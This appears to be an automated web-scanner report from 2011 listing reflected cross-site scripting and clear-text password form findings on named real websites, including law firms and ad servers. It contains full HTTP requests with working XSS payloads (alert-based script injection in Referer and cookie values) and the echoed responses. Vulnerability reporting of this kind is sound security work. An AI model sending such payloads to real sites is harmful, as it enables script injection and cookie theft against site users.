HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75416"><a>0aa9a2a2b09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /professionals.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=75416"><a>0aa9a2a2b09
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Find an Attorney or Professional</title> <meta na ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=75416"><a>0aa9a2a2b09"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6ed"><a>0d08c6799e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /publications.cfm?id=2795&action=view HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=1e6ed"><a>0d08c6799e
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Trade mark owner can object to resale of 'perfume te ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=1e6ed"><a>0d08c6799e"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c070"><a>4421a84236f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /remote_access.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=6c070"><a>4421a84236f
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: OFFICE=;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 997bb"><a>c1452cc4d4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /search.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=997bb"><a>c1452cc4d4
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91afd"><a>22110ca1882 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /sitemap.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=91afd"><a>22110ca1882
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605f4"><a>5f16750633f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23; Referer: http://www.google.com/search?hl=en&q=605f4"><a>5f16750633f
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A01%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D780%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:01 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d539"-alert(1)-"d98fb76f347 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.kasimer-ittig.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5d539"-alert(1)-"d98fb76f347
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11e39"-alert(1)-"c7efa5beb18 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~01041111e39"-alert(1)-"c7efa5beb18; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1479B1099,2#668902|0,1,1;expires=Fri, 18 Feb 2011 18:01:17 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=509 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:01:17 GMT Connection: close Content-Length: 2115
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='';var zzCusto ...[SNIP]... d='INmz6woBADYAAHrQ5V4AAACH~01041111e39"-alert(1)-"c7efa5beb18';
var zzhasAd=undefined;
var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~01041111e39"-alert(1)-"c7efa5beb18;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b03b"-alert(1)-"d9b6e79ead6 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104112b03b"-alert(1)-"d9b6e79ead6; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:01:00 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=526 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:01:00 GMT Connection: close Content-Length: 2035
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='';var zzCusto ...[SNIP]... zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104112b03b"-alert(1)-"d9b6e79ead6';
var zzhasAd=undefined;
var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~0104112b03b"-alert(1)-"d9b6e79ead6;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the ltcid cookie is copied into the HTML document as plain text between tags. The payload 4bf45<script>alert(1)</script>08862fae6c1 was submitted in the ltcid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /g.lt?nvst=12596&nvtt=z&nvup=1&nvgpflid=547362597 HTTP/1.1 Host: lt.navegg.com Proxy-Connection: keep-alive Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E21b58676d82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ltcid=5473625974bf45<script>alert(1)</script>08862fae6c1
Response
HTTP/1.1 200 OK P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR' Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 20-Jan-2011 06:01:20 GMT Content-type: application/javascript Date: Wed, 19 Jan 2011 18:01:20 GMT Server: lighttpd/1.4.19 Content-Length: 84
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://dcregistry.com/cgi-bin/wbn2/wbn_admin.pl
The form contains the following password field:
password
Request
GET /wbn/welcome.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:20:53 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 49869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://dcregistry.com/cgi-bin/wbn/wbn_admin.pl
The form contains the following password field:
password
Request
GET /wbn/welcome.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:20:53 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 49869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start reset password --> <form id="cnnConnectFormReset" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input type="password" id="new_password" name="newPassword"> <div id="cnnConnectResetErrors"> ...[SNIP]...
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start login --> <form onsubmit="return false;" id="cnnMoneyConnectFormLogin" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input class="" id="passwordinput" name="password" type="password"> <div id="cnnConnectLoginErrors" style="display: none;"> ...[SNIP]...
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-c ...[SNIP]... <!-- start registration --> <form onsubmit="return false;" id="cnnConnectFormRegister" class="overlay_content"> <a href="javascript:void(0)" class="close"> ...[SNIP]... </p> <input id="signup_password" name="password" maxlength="10" type="password" /> <span class="fieldTip"> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.local.com/results.aspx
The form contains the following password field:
password
Request
GET /results.aspx HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.political.cov.com/login.cfm
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.political.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 16:55:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /alumni/Index.cfm HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w ...[SNIP]... <td align="left" valign="top"> <form method="post" action="alumni_authenticate.cfm" id="loginFrm">
